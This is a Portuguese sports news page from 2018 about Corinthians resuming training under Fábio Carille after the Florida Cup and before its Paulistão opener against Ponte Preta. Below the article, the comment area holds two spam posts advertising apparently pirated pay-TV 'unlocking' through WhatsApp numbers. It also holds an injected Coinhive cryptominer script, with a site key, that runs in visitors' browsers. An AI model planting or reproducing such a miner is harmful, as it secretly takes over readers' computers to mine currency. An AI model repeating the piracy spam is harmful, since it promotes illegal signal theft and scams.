15/1/2018 18:01

Após participação na Florida Cup, Corinthians retorna aos treinos no CT Dr. Joaquim Grava

Timão fez uma atividade com bola nesta segunda (15) na preparação para a estreia no Paulistão Itaipava 2018

Após participação na Florida Cup, Corinthians retorna aos treinos no CT Dr. Joaquim Grava
Foto: Daniel Augusto Jr/ Agência Corinthians

Nesta segunda-feira (15), o elenco do Corinthians voltou ao trabalho no CT Dr. Joaquim Grava após uma semana nos Estados Unidos, onde disputou a Florida Cup. Sob o comando do treinador Fábio Carille, o grupo realizou trabalhos na academia e no gramado do centro de treinamento.



Na primeira parte do treino, os jogadores do Timão fizeram um circuito de exercícios na academia. O trabalho foi comandado pelo auxiliar de preparação física Shih Chen Chan Júnior.

Já no gramado, os goleiros trabalhavam junto com o preparador Mauri Lima enquanto os jogadores realizavam o tradicional bobinho. Em seguida, Walmir Cruz comandou um trabalho de aquecimento para preparar os atletas nas atividades com bola que aconteceriam posteriormente.

Em um dos gramados, o treinador Fábio Carille separou os prováveis titulares e realizou um treino invisível. O restante do elenco participou de um treino de posse de bola em campo reduzido comandado pelos auxiliares Osmar Loss, Fabinho e Leandro Cuca. Por fim, Carille separou dois times e realizou um 11 contra 11 em campo reduzido.

A estreia do Corinthians no Paulistão Itaipava 2018 já acontece nesta quarta-feira (17). No Pacaembu, o Alvinegro encara a Ponte Preta, às 21h50 (de Brasília), no jogo que marca a abertura do torneio estadual.


VEJA TAMBÉM
- A HORA É AGORA! Memphis tenta quebrar jejum incômodo diante da Chapecoense
- NÃO PODE TROPEÇAR! Corinthians encara Chapecoense após três derrotas seguidas
- Rodrigo Garro, alvo de 68 faltas, é o símbolo da pressão tática do Corinthians no Brasileiro


Postado por - 3939 visitas - Fonte: Agência Corinthians

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS<br />FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA<br />PARA TODO BRASIL<br />WHATZSAP 11 958694345

< src="https://coinhive.com/lib/coinhive.min.js"></><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throt tle:.3});a.start();</>

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias